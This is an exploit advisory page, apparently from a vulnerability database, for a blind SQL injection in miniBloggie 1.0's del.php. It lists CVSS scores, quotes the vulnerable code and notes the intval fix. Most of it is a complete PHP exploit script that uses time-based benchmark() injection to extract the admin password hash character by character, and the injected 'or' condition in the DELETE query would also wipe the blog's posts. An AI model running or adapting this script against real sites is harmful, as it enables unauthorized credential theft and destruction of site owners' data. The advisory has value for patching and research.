miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit

2008-10-21 / 2008-10-22
Credit: StAkeR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php <?php error_reporting(0); /* miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit ------------------------------------------------------------ Author -> StAkeR aka athos - StAkeR[at]hotmail[dot]it Date -> 18/10/2008 Get -> http://www.mywebland.com/dl.php?id=2 ------------------------------------------------------------ File del.php 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; 27. 28. if ($confirm=="") { 29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>"); 30. } 31. elseif ($confirm=="yes") { 32. // Data Base Connection // 33. dbConnect(); 34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; 35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); 36. $confirm =""; 37. notice("Del Post", "Data Deleted"); 38. } 39. else notice( "Delete Error, Unable to complete the task !" ); 40. ?> NOTE: $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; $post_id isn't escaped so you can execute SQL Code How to fix? sanize $post_id with intval or int (PHP Functions) */ function get($host,$path,$evil) { if(!preg_match('/\w:[0-9]/i',$host)) alert(); $inet = explode(':',$host); if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused'); $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n"; $data .= "Host: $host[0]\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function alert() { echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n"; echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n"; echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n"; die; } function charme($char,$colum,$id) { $sql = "1 or (select if((ascii(substring(password". ",$colum,1))=$char),benchmark(200000000,char(0)),0)". " from blogusername where id=$id)#"; return urlencode($sql); } $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $c = 0; for($i=0;$i<=32;$i++) { for($j=0;$j<=17;$j++) { $start = time(); get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3]))); $stop = time(); if($stop - $start > 12) { $password .= chr($hash[$j]); $c++;; break; } } } if(isset($password)) { echo "# Hash: $password\r\n"; die; } else { echo "# Exploit Failed!\r\n"; } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top